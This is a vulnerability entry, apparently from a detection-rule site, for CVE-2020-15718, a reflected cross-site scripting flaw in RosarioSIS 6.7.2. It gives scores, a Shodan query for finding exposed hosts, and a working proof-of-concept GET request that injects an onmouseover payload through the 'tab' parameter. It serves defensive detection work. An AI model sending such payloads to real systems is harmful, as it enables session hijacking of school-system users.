🔙 목록으로 돌아가기

CVE-2020-15718: RosarioSIS 6.7.2 - Cross-Site Scripting

TitleRosarioSIS 6.7.2 - Cross-Site Scripting
Author0xr2r,jarvis-survives
SeverityMedium
ImpactAn attacker can execute arbitrary JavaScript in the context of a victim's browser session, potentially leading to session hijacking, credential theft, or other malicious actions.
RemediationUpdate RosarioSIS to the latest version where input validation has been improved.
CVSS Score6.1
EPSS Score0.13629
CVE IDCVE-2020-15718
CWE IDCWE-79
Shodan Queryhttp.html:"RosarioSIS"
Tags cve cve2020 rosarios xss rosariosis vuln

🔍 Vulnerability Description

RosarioSIS version 6.7.2 and earlier contains a reflected cross-site scripting (XSS) vulnerability in the Preferences module. The ‘tab’ parameter in Modules.php is not properly sanitized, allowing an attacker to inject arbitrary JavaScript code via a crafted URL.

🌐 HTTP Request

GET /Modules.php?modname=Users/Preferences.php&tab="%20onmouseover=alert(document.domain)%20x=" HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-15718.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-15718.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A